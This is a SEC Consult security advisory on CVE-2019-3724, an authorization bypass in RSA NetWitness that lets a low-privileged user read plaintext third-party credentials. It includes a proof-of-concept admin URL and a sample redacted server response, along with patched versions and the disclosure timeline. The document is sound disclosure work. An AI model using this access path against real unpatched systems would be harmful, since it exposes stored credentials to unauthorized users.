Authorization Bypass Vulnerability in RSA NetWitness (CVE-2019-3724)

Project Description

RSA NetWitness is affected by an authorization bypass that can be exploited by an attacker in order to access an administrative resource that may contain plain text credentials.


Vendor description

“RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA’s award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime.”

Source: https://www.rsa.com/en-us/company/about

 

Business recommendation

By exploiting the vulnerability documented in this advisory an unauthorized attacker can access an administrative resource that may contain plain text credentials to a 3rd party system.

The vendor provides a patch which should be installed on affected systems.

 

Vulnerability overview/description

The authorization mechanism provided by the platform is prone to an authorization bypass vulnerability, which can be easily exploited by authenticated (but low privileged) remote attackers for gaining access to administrative information including plaintext passwords.

 

Proof of concept

A logged-in low privileged user (e.g. with role Analyst) is able to access an administrative resource by calling the following URL:

https://[host]/admin/system/whois/properties

After the above URL is accessed, the server returns the following HTTP response that contains sensitive information to a 3rd party whois service including plaintext passwords:

HTTP/1.1 200 OK
Server: nginx
Date: [snip]
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: [snip]
Content-Length: 795

{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}} 

Vulnerable / tested versions

The identified vulnerability has been verified to exist in the RSA NetWitness platform, version 11.1.0.1.

According to the vendor, platform version 10 is also affected.

The following versions are vulnerable:

  • < 10.6.6.1
  • < 11.2.1.1

Vendor contact timeline

2018-10-01Contacting vendor through PGP via secure@dell.com
2018-10-02Vendor acknowledges the information was received, forwards the info to the relevant department
2018-10-11Vendor confirms the impact of the authorization issue, starts to work on the remediation timeline
2018-10-15Vendor provides additional information
2018-10-22Contacting vendor to provide the remediation timeline
2018-10-23Further email exchange related to the remediation timeline
2019-01-18Vendor provides an update on the fix timeline
2019-03-05Asking for a status update
2019-03-06Vendor provides a status update on the release, patch for platform version 11 will be released in March, version 10 Mid-April
2019-04-01Asking for a specific release date & further status update
2019-04-01Vendor: release is scheduled for 23rd April 2019, but may change, they will inform us
2019-05-06Asking for a status update; no answer
2019-05-09Noticed that the new release is online fow a while now, asking the vendor for a status update again
2019-05-09Vendor: published security advisory URL and CVE
2019-05-15SEC Consult advisory release

Solution

The following patched versions address the identified issue:

  • 11.2.1.1
  • 10.6.6.1

Security advisory of the vendor: https://community.rsa.com/docs/DOC-104202

The vendor specifically told us that version 11.3 is not affected by this vulnerability.

Workaround

None.

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

EOF M. Juskauskas / @2019

 

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult?
Contact our local offices.

Project Details

  • TitleAuthorization Bypass
  • ProductRSA NetWitness
  • Vulnerable version<10.6.6.1, <11.2.1.1
  • Fixed version10.6.6.1, 11.2.1.1
  • CVE numberCVE-2019-3724
  • ImpactMedium
  • Homepagehttps://www.rsa.com
  • Found2018-09-18
  • ByMantas Juskauskas (Office Vilnius) | SEC Consult Vulnerability Lab

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Help

To continue, you must make a cookie selection. Below is an explanation of the different options and their meaning.

  • Accept all cookies:
    All cookies such as tracking and analytics cookies.
  • Accept first-party cookies only:
    Only cookies from this website.
  • Reject all tracking cookies:
    No cookies except for those necessary for technical reasons are set.

You can change your cookie setting here anytime: Blog. Blog

Back